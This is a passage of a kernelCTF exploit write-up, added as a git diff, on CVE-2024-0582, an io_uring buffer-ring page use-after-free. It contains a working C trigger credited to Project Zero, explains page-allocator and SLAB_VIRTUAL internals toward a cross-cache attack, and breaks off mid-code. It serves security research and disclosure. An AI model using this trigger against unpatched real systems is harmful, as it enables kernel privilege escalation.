diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md new file mode 100644 index 00000000..519ca276 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md @@ -0,0 +1,1201 @@ +## Trigger the Vulnerability + +The `io_uring_register` syscall supports various registration ops to allow a user to register different resources that `io_uring` can use. Specifically, with `IORING_REGISTER_PBUF_RING` combined with the `IOU_PBUF_RING_MMAP` flag, the kernel allocates pages for an `io_buffer_list` and attaches it to the `io_ring_ctx` under a given `bgid`. + +```c +int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg) +{ + struct io_uring_buf_reg reg; + struct io_buffer_list *bl, *free_bl = NULL; + int ret; + + if (copy_from_user(®, arg, sizeof(reg))) + return -EFAULT; +/*...*/ + + if (!(reg.flags & IOU_PBUF_RING_MMAP)) + ret = io_pin_pbuf_ring(®, bl); + else + ret = io_alloc_pbuf_ring(®, bl); // <-- IOU_PBUF_RING_MMAP + + if (!ret) { + bl->nr_entries = reg.ring_entries; + bl->mask = reg.ring_entries - 1; + + io_buffer_add_list(ctx, bl, reg.bgid); // <-- add buffer_list to ctx with bgid + return 0; + } + + kfree(free_bl); + return ret; +} +``` + +In the `io_alloc_pbuf_ring()` function below, the kernel uses `__get_free_pages()` to allocate pages for the buffer ring: + +```c +static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg, + struct io_buffer_list *bl) +{ + gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP; + size_t ring_size; + void *ptr; + + ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring); + ptr = (void *) __get_free_pages(gfp, get_order(ring_size)); + if (!ptr) + return -ENOMEM; + + bl->buf_ring = ptr; + bl->is_mapped = 1; + bl->is_mmap = 1; + return 0; +} +``` + +Later, from userspace, one can request to mmap the buffer via a `vm_pgoff` that encodes both the `bgid` and `IORING_OFF_PBUF_RING`. + +The internal function `io_uring_validate_mmap_request()` checks which resource is being requested ({SQ, CQ} ring, SQEs, or pbuf ring) and returns the corresponding kernel virtual address: + +```c +static void *io_uring_validate_mmap_request(struct file *file, + loff_t pgoff, size_t sz) +{ + struct io_ring_ctx *ctx = file->private_data; + loff_t offset = pgoff << PAGE_SHIFT; + struct page *page; + void *ptr; + + if (ctx->flags & IORING_SETUP_NO_MMAP) + return ERR_PTR(-EINVAL); + + switch (offset & IORING_OFF_MMAP_MASK) { + case IORING_OFF_SQ_RING: + case IORING_OFF_CQ_RING: + ptr = ctx->rings; + break; + case IORING_OFF_SQES: + ptr = ctx->sq_sqes; + break; + case IORING_OFF_PBUF_RING: { + unsigned int bgid; + + bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT; + mutex_lock(&ctx->uring_lock); + ptr = io_pbuf_get_address(ctx, bgid); // <-- get registered buffer from ctx according to bgid + mutex_unlock(&ctx->uring_lock); + if (!ptr) + return ERR_PTR(-EINVAL); + break; + } + default: + return ERR_PTR(-EINVAL); + } + + page = virt_to_head_page(ptr); + if (sz > page_size(page)) + return ERR_PTR(-EINVAL); + + return ptr; +} +``` + +The call to `io_uring_validate_mmap_request()` returns the kernel’s base address of the buffer ring. 
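+
+For reference, here is a minimal userspace sketch (my own illustration, not part of the original writeup; it only assumes the uapi constants from `<linux/io_uring.h>` and a hypothetical helper name) of how the mmap offset for a given `bgid` is encoded so that `io_uring_validate_mmap_request()` can decode it:
+
+```c
+#include <linux/io_uring.h>
+#include <sys/mman.h>
+
+/* Hypothetical helper: map the pbuf ring registered under `bgid`. */
+static void *map_pbuf_ring(int uring_fd, unsigned int bgid, size_t size)
+{
+	/* IORING_OFF_PBUF_RING selects the pbuf-ring case in the switch above;
+	 * the bgid is packed into the offset via IORING_OFF_PBUF_SHIFT. */
+	off_t offset = IORING_OFF_PBUF_RING |
+		       ((off_t)bgid << IORING_OFF_PBUF_SHIFT);
+
+	return mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED,
+		    uring_fd, offset);
+}
+```
+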
+`io_uring_mmap()` then uses that pointer as follows:
+
+```c
+static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
+{
+	size_t sz = vma->vm_end - vma->vm_start;
+	unsigned long pfn;
+	void *ptr;
+
+	ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
+	if (IS_ERR(ptr))
+		return PTR_ERR(ptr);
+
+	pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
+	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
+}
+```
+
+A user can unregister this buffer ring via `IORING_UNREGISTER_PBUF_RING`. Internally, the kernel will free the pages or unpin them accordingly.
+
+```c
+int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
+{
+	struct io_uring_buf_reg reg;
+	struct io_buffer_list *bl;
+
+	if (copy_from_user(&reg, arg, sizeof(reg)))
+		return -EFAULT;
+	if (reg.resv[0] || reg.resv[1] || reg.resv[2])
+		return -EINVAL;
+	if (reg.flags)
+		return -EINVAL;
+
+	bl = io_buffer_get_list(ctx, reg.bgid); // <-- get registered buffer_list from ctx according to bgid
+	if (!bl)
+		return -ENOENT;
+	if (!bl->is_mapped)
+		return -EINVAL;
+
+	__io_remove_buffers(ctx, bl, -1U); // <-- remove buffer
+	if (bl->bgid >= BGID_ARRAY) {
+		xa_erase(&ctx->io_bl_xa, bl->bgid);
+		kfree(bl);
+	}
+	return 0;
+}
+
+static int __io_remove_buffers(struct io_ring_ctx *ctx,
+			       struct io_buffer_list *bl, unsigned nbufs)
+{
+	unsigned i = 0;
+
+	/* shouldn't happen */
+	if (!nbufs)
+		return 0;
+
+	if (bl->is_mapped) {
+		i = bl->buf_ring->tail - bl->head;
+		if (bl->is_mmap) {
+			folio_put(virt_to_folio(bl->buf_ring)); // <-- refcount--
+			bl->buf_ring = NULL;
+			bl->is_mmap = 0;
+		} else if (bl->buf_nr_pages) {
+			int j;
+
+			for (j = 0; j < bl->buf_nr_pages; j++)
+				unpin_user_page(bl->buf_pages[j]);
+			kvfree(bl->buf_pages);
+			bl->buf_pages = NULL;
+			bl->buf_nr_pages = 0;
+		}
+		/* make sure it's seen as empty */
+		INIT_LIST_HEAD(&bl->buf_list);
+		bl->is_mapped = 0;
+		return i;
+	}
+/*...*/
+}
+```
+
+Notice the call to `folio_put(virt_to_folio(bl->buf_ring))`, which decrements the folio/page reference count.
+
+The vulnerability is that `remap_pfn_range()` is a lower-level API that maps a given physical address range into userspace, creating `VM_PFNMAP` VMAs. `VM_PFNMAP` mappings are special: unlike normal memory mappings, there is no lifetime information associated with the mapping. It is just a raw mapping of PFNs with no reference counting of the underlying `struct page`, so the caller is responsible for holding references to the pages for as long as they are mapped into userspace.
+
+```c
+static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
+{
+	size_t sz = vma->vm_end - vma->vm_start;
+	unsigned long pfn;
+	void *ptr;
+
+	ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
+	if (IS_ERR(ptr))
+		return PTR_ERR(ptr);
+
+	pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
+	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
+}
+```
+
+So if a user registers a buffer ring with `IORING_REGISTER_PBUF_RING`, `mmap()`s it, and then frees it with `IORING_UNREGISTER_PBUF_RING`, the user keeps a readable and writable mapping of already-freed pages, which is a well-known universal root primitive.
+ +A poc taken from [Linux >=6.4: io_uring: page UAF via buffer ring mmap - Project Zero](https://project-zero.issues.chromium.org/issues/42451653): + +```c +#define _GNU_SOURCE +#include <err.h> +#include <linux/io_uring.h> +#include <stdio.h> +#include <string.h> +#include <sys/mman.h> +#include <sys/syscall.h> +#include <unistd.h> + +#define SYSCHK(x) ({ \ +typeof(x) __res = (x); \ +if (__res == (typeof(x))-1) \ +err(1, "SYSCHK(" #x ")"); \ +__res; \ +}) + +int main(void) { + struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY}; + int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms)); + printf("uring_fd = %d\n", uring_fd); + + struct io_uring_buf_reg reg = { + .ring_entries = 1, .bgid = 0, .flags = IOU_PBUF_RING_MMAP}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, + ®, 1)); + + void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, + MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING)); + printf("pbuf mapped at %p\n", pbuf_mapping); + + struct io_uring_buf_reg unreg = {.bgid = 0}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, + &unreg, 1)); + while (1) { + memset(pbuf_mapping, 0xaa, 0x1000); + usleep(100000); + } +} +``` + +## Revisit of Page UAF + +Since page UAF is a very powerful primitive, exploit is quite easy and straightforward. Before we go ahead into the trivial exploit part, let's revisit how page UAF works, especially on kernelCTF's hardened mitigation instance. + +### PCP(per_cpu_pages) list & migratetype + +#### folio_put + +If a folio's reference count drops to zero, the memory will be released back to the page allocator and may be used by another allocation immediately. + +``` c +static inline void folio_put(struct folio *folio) +{ + if (folio_put_testzero(folio)) + __folio_put(folio); +} + +void __folio_put(struct folio *folio) +{ + if (unlikely(folio_is_zone_device(folio))) + free_zone_device_page(&folio->page); + else if (unlikely(folio_test_large(folio))) // <-- multi-page folio? + __folio_put_large(folio); + else + __folio_put_small(folio); +} +``` + +Normally, depending on the folio type, the call flows into either the single-page or multi-page release path: + +```c +// 👇 single page release path +static void __folio_put_small(struct folio *folio) +{ + __page_cache_release(folio); + mem_cgroup_uncharge(folio); + free_unref_page(&folio->page, 0); // <-- try free via pcp +} + +// 👇 multiple page release path +static void __folio_put_large(struct folio *folio) +{ + if (!folio_test_hugetlb(folio)) + __page_cache_release(folio); + destroy_large_folio(folio); +} + +void destroy_large_folio(struct folio *folio) +{ + if (folio_test_hugetlb(folio)) { + free_huge_folio(folio); + return; + } + + if (folio_test_large_rmappable(folio)) + folio_undo_large_rmappable(folio); + + mem_cgroup_uncharge(folio); + free_the_page(&folio->page, folio_order(folio)); +} +``` + +The function `free_the_page()` decides whether to place the pages into the PCP list or release them directly to the buddy allocator: + +```c +#define PAGE_ALLOC_COSTLY_ORDER 3 + +static inline bool pcp_allowed_order(unsigned int order) +{ + if (order <= PAGE_ALLOC_COSTLY_ORDER) + return true; +#ifdef CONFIG_TRANSPARENT_HUGEPAGE + if (order == pageblock_order) + return true; +#endif + return false; +} + +static inline void free_the_page(struct page *page, unsigned int order) +{ + if (pcp_allowed_order(order)) /* Via pcp? 
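	   Only orders up to PAGE_ALLOC_COSTLY_ORDER (or, with THP, the pageblock order) qualify, per pcp_allowed_order() above.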
*/ + free_unref_page(page, order); + else + __free_pages_ok(page, order, FPI_NONE); +} +``` + +If the released pages meet all of these conditions: + +- `migratetype < MIGRATE_PCPTYPES` +- `order <= PAGE_ALLOC_COSTLY_ORDER` +- `pcp->count` is below the `high` watermark + +then they are added to the `pcp->lists[pindex]`(where `pindex` is calculated through `order` and `migratetype`) rather than immediately being returned to the buddy allocator. + +This logic is handled in `free_unref_page()` and `free_unref_page_commit()`: + +```c +/* + * Free a pcp page + */ +void free_unref_page(struct page *page, unsigned int order) +{ + unsigned long __maybe_unused UP_flags; + struct per_cpu_pages *pcp; + struct zone *zone; + unsigned long pfn = page_to_pfn(page); + int migratetype, pcpmigratetype; + + if (!free_unref_page_prepare(page, pfn, order)) + return; + + migratetype = pcpmigratetype = get_pcppage_migratetype(page); + if (unlikely(migratetype >= MIGRATE_PCPTYPES)) { + if (unlikely(is_migrate_isolate(migratetype))) { + free_one_page(page_zone(page), page, pfn, order, migratetype, FPI_NONE); + return; + } + pcpmigratetype = MIGRATE_MOVABLE; + } + + zone = page_zone(page); + pcp_trylock_prepare(UP_flags); + pcp = pcp_spin_trylock(zone->per_cpu_pageset); + if (pcp) { + free_unref_page_commit(zone, pcp, page, pcpmigratetype, order); + pcp_spin_unlock(pcp); + } else { + free_one_page(zone, page, pfn, order, migratetype, FPI_NONE); + } + pcp_trylock_finish(UP_flags); +} + +static inline unsigned int order_to_pindex(int migratetype, int order) +{ +/*...*/ + return (MIGRATE_PCPTYPES * order) + migratetype; +} + +static void free_unref_page_commit(struct zone *zone, struct per_cpu_pages *pcp, + struct page *page, int migratetype, + unsigned int order) +{ + int high; + int pindex; + bool free_high; + + __count_vm_events(PGFREE, 1 << order); + pindex = order_to_pindex(migratetype, order); + // 👇 add to the pcp list + list_add(&page->pcp_list, &pcp->lists[pindex]); + pcp->count += 1 << order; + + free_high = (pcp->free_factor && order && order <= PAGE_ALLOC_COSTLY_ORDER); + + high = nr_pcp_high(pcp, zone, free_high); + if (pcp->count >= high) { + free_pcppages_bulk(zone, nr_pcp_free(pcp, high, free_high), pcp, pindex); + } +} +``` + +#### __alloc_pages + +When the kernel needs new pages, it calls `__alloc_pages()`, which then calls `get_page_from_freelist()`. Internally, the allocation logic tries to grab pages from the PCP list first (via `rmqueue_pcplist()`): + +```c +/* + * This is the 'heart' of the zoned buddy allocator. + */ +struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid, + nodemask_t *nodemask) +{ +/*...*/ + /* First allocation attempt */ + page = get_page_from_freelist(alloc_gfp, order, alloc_flags, &ac); + if (likely(page)) + goto out; + +/*...*/ + return page; +} + + +``` + +Inside `get_page_from_freelist()` and `rmqueue()`: + +```c +/* + * get_page_from_freelist goes through the zonelist trying to allocate + * a page. 
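+ * For each candidate zone, rmqueue() below grabs low-order pages from the
+ * per-CPU (PCP) lists first and only falls back to the buddy freelists.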
+ */ +static struct page * +get_page_from_freelist(gfp_t gfp_mask, unsigned int order, int alloc_flags, + const struct alloc_context *ac) +{ + struct zoneref *z; + struct zone *zone; + struct pglist_data *last_pgdat = NULL; + bool last_pgdat_dirty_ok = false; + bool no_fallback; + +/*...*/ + +try_this_zone: + page = rmqueue(ac->preferred_zoneref->zone, zone, order, + gfp_mask, alloc_flags, ac->migratetype); + if (page) { + prep_new_page(page, order, gfp_mask, alloc_flags); + if (unlikely(alloc_flags & ALLOC_HIGHATOMIC)) + reserve_highatomic_pageblock(page, zone); + return page; + } +/*...*/ + + return NULL; +} + +__no_sanitize_memory +static inline +struct page *rmqueue(struct zone *preferred_zone, + struct zone *zone, unsigned int order, + gfp_t gfp_flags, unsigned int alloc_flags, + int migratetype) +{ + struct page *page; + + WARN_ON_ONCE((gfp_flags & __GFP_NOFAIL) && (order > 1)); + + if (likely(pcp_allowed_order(order))) { // <-- order <= PAGE_ALLOC_COSTLY_ORDER + page = rmqueue_pcplist(preferred_zone, zone, order, + migratetype, alloc_flags); + if (likely(page)) + goto out; + } + +/*...*/ + + VM_BUG_ON_PAGE(page && bad_range(zone, page), page); + return page; +} +``` + +The routine `rmqueue_pcplist()` attempts to remove pages from the relevant PCP list (matching `order` and `migratetype`), and return them immediately. If it cannot find suitable pages, it falls back to the buddy free list. + +```c +/* Lock and remove page from the per-cpu list */ +static struct page *rmqueue_pcplist(struct zone *preferred_zone, + struct zone *zone, unsigned int order, + int migratetype, unsigned int alloc_flags) +{ + struct per_cpu_pages *pcp; + struct list_head *list; + struct page *page; + unsigned long __maybe_unused UP_flags; + + /* spin_trylock may fail due to a parallel drain or IRQ reentrancy. */ + pcp_trylock_prepare(UP_flags); + pcp = pcp_spin_trylock(zone->per_cpu_pageset); + if (!pcp) { + pcp_trylock_finish(UP_flags); + return NULL; + } + + pcp->free_factor >>= 1; + list = &pcp->lists[order_to_pindex(migratetype, order)]; + page = __rmqueue_pcplist(zone, order, migratetype, alloc_flags, pcp, list); + pcp_spin_unlock(pcp); + pcp_trylock_finish(UP_flags); + if (page) { + __count_zid_vm_events(PGALLOC, page_zonenum(page), 1 << order); + zone_statistics(preferred_zone, zone, 1); + } + return page; +} +``` + +### Notes on SLAB_VIRTUAL + +The document of `SLAB_VIRTUAL` can be checked at [self-protection.rst](https://github.com/thejh/linux/blob/slub-virtual-v6.6/Documentation/security/self-protection.rst). + +The `SLAB_VIRTUAL` mitigation focuses on preventing slab virtual address reuse by reserving a region of virtual memory for the slab allocator. And when `SLAB_VIRTUAL` is enabled, the slab's lifetime is not associated with slab pages anymore. + +#### `SLAB_VIRTUAL` disabled: + +##### allocate_slab + +Inside `alloc_slab_page()`: When we try to allocate a new slab, we are actually trying to get pages from buddy allocator, and later we call these pages we got `slab`. 
+```c
+static inline struct slab *alloc_slab_page(struct kmem_cache *s,
+		gfp_t meta_flags, gfp_t flags, int node,
+		struct kmem_cache_order_objects oo)
+{
+	struct folio *folio;
+	struct slab *slab;
+	unsigned int order;
+
+	if (slab_virtual_enabled()) // <-- disabled now
+		return alloc_slab_page_virtual(s, meta_flags, flags, node, oo);
+	// <-- We enter the code below
+	order = oo_order(oo);
+
+	if (node == NUMA_NO_NODE)
+		folio = (struct folio *)alloc_pages(flags, order);
+	else
+		folio = (struct folio *)__alloc_pages_node(node, flags, order);
+
+	if (!folio)
+		return NULL;
+
+	slab = folio_slab(folio);
+	folio_set_slab(folio, slab);
+
+	return slab;
+}
+```
+
+As the comment on `folio_slab` says, `struct slab` is just a different representation of a `folio` (a `folio` being a way of representing a set of physically contiguous base pages).
+
+```c
+/**
+ * folio_slab - Converts from folio to slab.
+ * @folio: The folio.
+ *
+ * Currently struct slab is a different representation of a folio where
+ * folio_test_slab() is true.
+ *
+ * Return: The slab which contains this folio.
+ */
+#define folio_slab(folio) (_Generic((folio),				\
+	const struct folio *:	(const struct slab *)(folio),		\
+	struct folio *:		(struct slab *)(folio)))
+
+/**
+ * slab_folio - The folio allocated for a slab
+ * @slab: The slab.
+ *
+ * Slabs are allocated as folios that contain the individual objects and are
+ * using some fields in the first struct page of the folio - those fields are
+ * now accessed by struct slab. It is occasionally necessary to convert back to
+ * a folio in order to communicate with the rest of the mm. Please use this
+ * helper function instead of casting yourself, as the implementation may change
+ * in the future.
+ */
+#define slab_folio(s) (_Generic((s),				\
+	const struct slab *:	(slab_virtual_enabled() ? s->backing_folio : (const struct folio *)s),	\
+	struct slab *:		(slab_virtual_enabled() ? s->backing_folio : (struct folio *)s)))
+```
+
+##### free_slab
+
+When a slab is about to be freed, `__free_slab()` runs:
+
+```c
+static void __free_slab(struct kmem_cache *s, struct slab *slab)
+{
+	struct folio *folio;
+	int order;
+	int pages;
+
+	if (slab_virtual_enabled()) { // <-- disabled now
+		__free_slab_virtual(s, (struct virtual_slab *)slab);
+		return;
+	}
+
+	folio = slab_folio(slab);
+	order = folio_order(folio);
+	pages = 1 << order;
+
+	folio_clear_slab(folio, slab);
+	mm_account_reclaimed_pages(pages);
+	unaccount_slab(slab, order, s);
+	__free_pages(&folio->page, order);
+}
+```
+
+The slab's pages are freed and returned to the buddy allocator as well.
+
+If an attacker manages to return a slab to the buddy allocator and then gets its pages allocated back as a new slab (whose owning `kmem_cache` can be different from the previous one), the attacker has performed a `cross-cache` attack.
+
+#### `SLAB_VIRTUAL` enabled:
+
+##### allocate_slab
+
+Everything changes when `SLAB_VIRTUAL` is enabled:
+
+```c
+static inline struct slab *alloc_slab_page(struct kmem_cache *s,
+		gfp_t meta_flags, gfp_t flags, int node,
+		struct kmem_cache_order_objects oo)
+{
+	struct folio *folio;
+	struct slab *slab;
+	unsigned int order;
+
+	if (slab_virtual_enabled()) // <-- enabled now
+		// 👇 We directly return here
+		return alloc_slab_page_virtual(s, meta_flags, flags, node, oo);
+	/*...*/
+}
+```
+
+The `slab` (which we should now really call a `virtual_slab`) is no longer simply another view of a `folio`.
+When the kernel tries to allocate a new `virtual_slab`, the `virtual_slab` is placed in `SLUB virtual memory` instead of the `virtual memory map (vmemmap_base)`. A `virtual_slab` now consists of two parts, `meta` and `data`, and the `alloc_slab_meta()` function reserves a range of virtual address space for both of them:
+
+```c
+/*
+ * Reserve a range of virtual address space, ensure that we have page tables for
+ * it, and allocate a corresponding struct slab.
+ * This is cold code, we don't really have to worry about performance here.
+ */
+static struct virtual_slab *alloc_slab_meta(unsigned int order, gfp_t gfp_flags)
+{
+	unsigned long alloc_size = PAGE_SIZE << order;
+	unsigned long flags;
+	unsigned long old_base;
+	unsigned long data_range_start, data_range_end;
+	unsigned long meta_range_start, meta_range_end;
+	unsigned long addr;
+	struct virtual_slab *slab, *sp;
+	bool valid_start, valid_end;
+
+	gfp_flags &= (__GFP_HIGH | __GFP_RECLAIM | __GFP_IO |
+		      __GFP_FS | __GFP_NOWARN | __GFP_RETRY_MAYFAIL |
+		      __GFP_NOFAIL | __GFP_NORETRY | __GFP_MEMALLOC |
+		      __GFP_NOMEMALLOC);
+	/* New page tables and metadata pages should be zeroed */
+	gfp_flags |= __GFP_ZERO;
+
+	slub_valloc_lock(flags);
+retry_locked:
+	old_base = slub_addr_current;
+
+	/*
+	 * We drop the lock. The following code might sleep during
+	 * page table allocation. Any mutations we make before rechecking
+	 * slub_addr_current are idempotent, so that's fine.
+	 */
+	slub_valloc_unlock(flags);
+
+	/*
+	 * [data_range_start, data_range_end) is the virtual address range where
+	 * this slab's objects will be mapped.
+	 * We want alignment appropriate for the order. Note that this could be
+	 * relaxed based on the alignment requirements of the objects being
+	 * allocated, but for now, we behave like the page allocator would.
+	 */
+	data_range_start = ALIGN(old_base + slub_virtual_guard_size, alloc_size);
+	data_range_end = data_range_start + alloc_size;
+
+	valid_start = data_range_start >= SLAB_DATA_BASE_ADDR &&
+		IS_ALIGNED(data_range_start, PAGE_SIZE);
+	valid_end = data_range_end >= SLAB_DATA_BASE_ADDR &&
+		IS_ALIGNED(data_range_end, PAGE_SIZE);
+	if (CHECK_DATA_CORRUPTION(!valid_start,
+				  "invalid slab data range start") ||
+	    CHECK_DATA_CORRUPTION(!valid_end,
+				  "invalid slab data range end"))
+		return NULL;
+
+	/* We ran out of virtual memory for slabs */
+	if (WARN_ON_ONCE(data_range_start >= SLAB_END_ADDR ||
+			 data_range_end >= SLAB_END_ADDR))
+		return NULL;
+
+	/*
+	 * [meta_range_start, meta_range_end) is the range where the struct
+	 * slabs for the current data range are mapped. The first struct slab,
+	 * located at meta_range_start is the head slab that contains the actual
+	 * data, all other struct slabs in the range point to the head slab.
+	 */
+	meta_range_start = virt_to_slab_virtual_raw(data_range_start);
+	meta_range_end = virt_to_slab_virtual_raw(data_range_end);
+
+	/* Ensure the meta range is mapped.
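+	 * The struct slab metadata covering this data range lives in this meta
+	 * range; any missing metadata pages and page tables are allocated on
+	 * demand below.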
*/ + for (addr = ALIGN_DOWN(meta_range_start, PAGE_SIZE); + addr < meta_range_end; addr += PAGE_SIZE) { + pte_t *ptep = slub_get_ptep(addr, gfp_flags, true); + + if (ptep == NULL) + return NULL; + + slub_valloc_lock(flags); + if (pte_none(READ_ONCE(*ptep))) { + struct page *meta_page; + + slub_valloc_unlock(flags); + meta_page = alloc_page(gfp_flags); + if (meta_page == NULL) + return NULL; + slub_valloc_lock(flags); + + /* Make sure that no one else has already mapped that page */ + if (pte_none(READ_ONCE(*ptep))) + set_pte_safe(ptep, + mk_pte(meta_page, PAGE_KERNEL)); + else + __free_page(meta_page); + } + slub_valloc_unlock(flags); + } + + /* Ensure we have page tables for the data range. */ + for (addr = data_range_start; addr < data_range_end; + addr += PAGE_SIZE) { + pte_t *ptep = slub_get_ptep(addr, gfp_flags, true); + + if (ptep == NULL) + return NULL; + } + + /* Did we race with someone else who made forward progress? */ + slub_valloc_lock(flags); + if (old_base != slub_addr_current) + goto retry_locked; + + /* Success! Grab the range for ourselves. */ + slub_addr_current = data_range_end; + slub_valloc_unlock(flags); + + slab = (struct virtual_slab *)meta_range_start; + spin_lock_init(&slab->slab.slab_lock); + + /* Initialize basic slub metadata for virt_to_slab() */ + for (sp = slab; (unsigned long)sp < meta_range_end; sp++) + sp->compound_slab_head = slab; + + return slab; +} + +static struct virtual_slab *get_free_slab(struct kmem_cache *s, + struct kmem_cache_order_objects oo, gfp_t meta_gfp_flags, + struct list_head *freed_slabs) +{ + unsigned long flags; + struct virtual_slab *slab; + +/*...*/ + spin_unlock_irqrestore(&s->virtual.freed_slabs_lock, flags); + slab = alloc_slab_meta(oo_order(oo), meta_gfp_flags); + if (slab == NULL) + return NULL; +/*...*/ + return slab; +} +``` + +After the kernel gets the `virtual_slab`, it will get pages from buddy allocator, but this time these pages are used as so-called `backing_folio` of `virtual_slab`. + +```c +static inline void folio_set_slab(struct folio *folio, struct slab *slab) +{ + __folio_set_slab(folio); + /* Make the flag visible before any changes to folio->mapping */ + smp_wmb(); + + if (slab_virtual_enabled()) + slab->backing_folio = folio; + + if (folio_is_pfmemalloc(folio)) + slab_set_pfmemalloc(slab); +} + +static struct slab *alloc_slab_page_virtual(struct kmem_cache *s, + gfp_t meta_gfp_flags, gfp_t gfp_flags, int node, + struct kmem_cache_order_objects oo) +{ + struct folio *folio; + struct virtual_slab *slab; + unsigned int order = oo_order(oo); + unsigned long flags; + void *virt_mapping; + pte_t *ptep; + struct list_head *freed_slabs; + + if (order == oo_order(s->min)) + freed_slabs = &s->virtual.freed_slabs_min; + else + freed_slabs = &s->virtual.freed_slabs; + + slab = get_free_slab(s, oo, meta_gfp_flags, freed_slabs); + if (!slab) + return NULL; + + /* + * Avoid making UAF reads easily exploitable by repopulating + * with pages containing attacker-controller data - always zero + * pages. + */ + gfp_flags |= __GFP_ZERO; + if (node == NUMA_NO_NODE) + folio = (struct folio *)alloc_pages(gfp_flags, order); + else + folio = (struct folio *)__alloc_pages_node(node, gfp_flags, + order); + + if (!folio) { + /* Rollback: put the struct slab back. 
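+		 * The reserved virtual range and its struct slab stay on the
+		 * cache's freed_slabs list so that a later allocation can
+		 * reuse them.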
+		 */
+		spin_lock_irqsave(&s->virtual.freed_slabs_lock, flags);
+		list_add(&slab->slab.slab_list, freed_slabs);
+		WRITE_ONCE(s->virtual.nr_freed_pages,
+			s->virtual.nr_freed_pages + (1UL << slab_order(&slab->slab)));
+		spin_unlock_irqrestore(&s->virtual.freed_slabs_lock, flags);
+
+		return NULL;
+	}
+	folio_set_slab(folio, (struct slab *)slab);
+
+	slab->slab.oo = oo;
+
+	virt_mapping = slab_to_virt(slab);
+
+	/* Wire up physical folio */
+	for (unsigned long i = 0; i < (1UL << oo_order(oo)); i++) {
+		ptep = slub_get_ptep(
+			(unsigned long)virt_mapping + i * PAGE_SIZE, 0, false);
+		if (CHECK_DATA_CORRUPTION(pte_present(*ptep),
+					  "slab PTE already present"))
+			return NULL;
+		set_pte_safe(ptep, mk_pte(folio_page(folio, i), PAGE_KERNEL));
+	}
+
+	return (struct slab *)slab;
+}
+```
+
+The kernel thus sets up PTEs between `virt_mapping` (the `data` part of the `virtual_slab`) and the physical pages of the `backing_folio` before completing the allocation.
+
+##### free_slab
+
+When `SLAB_VIRTUAL` is enabled and the kernel is about to free a `virtual_slab`, the `virtual_slab` is no longer returned to the buddy allocator (after all, it was not allocated from the buddy allocator in the first place):
+
+```c
+static void __free_slab(struct kmem_cache *s, struct slab *slab)
+{
+	struct folio *folio;
+	int order;
+	int pages;
+
+	if (slab_virtual_enabled()) { // <-- enabled now
+		__free_slab_virtual(s, (struct virtual_slab *)slab);
+		// 👇 return directly here
+		return;
+	}
+
+	/*...*/
+}
+```
+
+Instead, the kernel clears the PTEs between `virt_mapping` and the physical pages of the `backing_folio`:
+
+```c
+static void __free_slab_virtual(struct kmem_cache *s, struct virtual_slab *slab)
+{
+	int order = oo_order(slab->slab.oo);
+	unsigned long pages = 1UL << order;
+	unsigned long slab_base = (unsigned long)slab_address(&slab->slab);
+
+	/* Clear the PTEs for the slab we're freeing */
+	for (unsigned long i = 0; i < pages; i++) {
+		unsigned long addr = slab_base + i * PAGE_SIZE;
+		pte_t *ptep = slub_get_ptep(addr, 0, false);
+
+		if (CHECK_DATA_CORRUPTION(!pte_present(*ptep),
+					  "slab PTE already clear"))
+			return;
+
+		ptep_clear(&init_mm, addr, ptep);
+	}
+
+	mm_account_reclaimed_pages(pages);
+	unaccount_slab(&slab->slab, order, s);
+
+	/*
+	 * We might not be able to a TLB flush here (e.g. hardware interrupt
+	 * handlers) so instead we give the slab to the TLB flusher thread
+	 * which will flush the TLB for us and only then free the physical
+	 * memory.
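+	 * The backing pages are only handed back to the page allocator after
+	 * that flush, so stale TLB entries can never be used to reach memory
+	 * that has already been reused.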
+ */ + queue_slab_tlb_flush(slab); +} +``` + +Later the kernel submit the `virtual_slab` to `slub_tlbflush_worker`, return the physical pages of the `backing_folio` to buddy allocator after flushing the TLB: + +```c +static void slub_tlbflush_worker(struct kthread_work *work) +{ + unsigned long irq_flags; + LIST_HEAD(local_queue); + struct virtual_slab *slab, *tmp; + unsigned long addr_start = ULONG_MAX; + unsigned long addr_end = 0; + + spin_lock_irqsave(&slub_kworker_lock, irq_flags); + list_splice_init(&slub_tlbflush_queue, &local_queue); + list_for_each_entry(slab, &local_queue, slab.slab_list) { + unsigned long start = (unsigned long)slab_to_virt(slab); + unsigned long end = start + PAGE_SIZE * + (1UL << oo_order(slab->slab.oo)); + + if (start < addr_start) + addr_start = start; + if (end > addr_end) + addr_end = end; + } + spin_unlock_irqrestore(&slub_kworker_lock, irq_flags); + + if (addr_start < addr_end) + flush_tlb_kernel_range(addr_start, addr_end); + + spin_lock_irqsave(&slub_kworker_lock, irq_flags); + list_for_each_entry_safe(slab, tmp, &local_queue, slab.slab_list) { + struct folio *folio = slab->slab.backing_folio; + struct kmem_cache *s = slab->slab.slab_cache; + + list_del(&slab->slab.slab_list); + folio_clear_slab(folio, &slab->slab); + __free_pages(folio_page(folio, 